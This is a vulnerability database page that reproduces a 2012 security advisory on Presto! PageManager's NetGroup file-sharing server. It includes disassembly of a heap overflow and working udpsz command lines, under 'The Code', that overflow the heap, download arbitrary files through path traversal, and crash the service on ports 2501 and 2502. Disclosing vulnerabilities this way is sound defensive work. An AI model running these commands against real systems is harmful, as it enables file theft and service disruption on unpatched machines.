Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

presto! pagemanager <= 9.01 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 17 Views

Presto! PageManager <= 9.01 - Multiple Vulnerabilities including heap-overflow, arbitrary files downloading and denial of servic

Code

                                                #######################################################################

                             Luigi Auriemma

Application:  Presto! PageManager
              http://www.newsoftinc.com/products/product_page.php?P_Id=5
Versions:     &#60;= 9.01
Platforms:    Windows, MacOSX
Bugs:         A] Heap-overflow
              B] Arbitray files downloading
              C] Denial of Service
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Presto! PageManager is a management software for scanners and it&#39;s
provided by default also by some hardware vendors (like Epson).

It&#39;s bundled with a (manual) server program called NetGroup for remote
files transfer:
&#34;The Network Group function helps you exchange files with your group
members. Everyone in the working group should have Presto! PageManager
running.&#34;


#######################################################################

=======
2) Bugs
=======

----------------
A] Heap-overflow
----------------

Buffer overflow on port 2502 while copying of the message string into a
small heap buffer:

  004151BE  |. 33C0           XOR EAX,EAX
  004151C0  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]  ; strlen
  004151C2  |. F7D1           NOT ECX
  004151C4  |. 2BF9           SUB EDI,ECX
  004151C6  |. 6A FF          PUSH -1
  004151C8  |. 8BC1           MOV EAX,ECX
  004151CA  |. 8BF7           MOV ESI,EDI
  004151CC  |. 8BFA           MOV EDI,EDX
  004151CE  |. C1E9 02        SHR ECX,2                     ; heap overflow
  004151D1  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  004151D3  |. 8BC8           MOV ECX,EAX
  004151D5  |. 83E1 03        AND ECX,3
  004151D8  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  004151DA  |. 8D4C24 14      LEA ECX,DWORD PTR SS:[ESP+14]
  004151DE  |. E8 1B370000    CALL &#60;JMP.&MFC42.#5572&#62;
  004151E3  |. 8B5424 10      MOV EDX,DWORD PTR SS:[ESP+10]
  004151E7  |. 8D4C24 2C      LEA ECX,DWORD PTR SS:[ESP+2C]
  004151EB  |. 51             PUSH ECX
  004151EC  |. 52             PUSH EDX
  004151ED  |. E8 56350000    CALL &#60;JMP.&PMCommon._GetFileExtName&#62;
  004151F2  |. BE 94014200    MOV ESI,NetGroup.00420194     ;  ASCII &#34;.NSOFT&#34;


-----------------------------
B] Arbitray files downloading
-----------------------------

The software allows downloading any file.


--------------------
C] Denial of Service
--------------------

Just a simple (auto)termination caused by the impossibility of
allocating the amount of memory specified by the client.

There is also a &#34;division by zero&#34; when specifying a file size of 0
bytes.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/18600.zip

A]
  udpsz -T -C &#34;00000100 ffff0200&#34; 0 -b a -C &#34;00 00 1000000000000000 00&#34; -1 SERVER 2502 8+0x02ffff
  just a quick test, exist better ways that show code execution

B]
  udpsz -D -3 -T -c &#34;\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01&#34; 0 -c &#34;\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini&#34; 0x1d -C &#34;00002000 00000000&#34; -1 SERVER 2502 8+0x15+8+0x100+8
  or
  udpsz -D -3 -T -c &#34;\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01&#34; 0 -c &#34;\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini&#34; 0x1d -C &#34;00002000 00000000&#34; -1 SERVER 2502 8+0x15+8+0x100+8

C]
  udpsz -T -C &#34;00010000 ffffffff&#34; SERVER 2501 -1
  or
  udpsz -T -C &#34;00000100 ffffffff&#34; SERVER 2502 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
presto! pagemanagermultiple vulnerabilitiesheap-overflowarbitrary files downloadingdenial of serviceremote exploitationwindowsmacosxluigi auriemmanetwork group functionbuffer overflowcode executionexploit.
17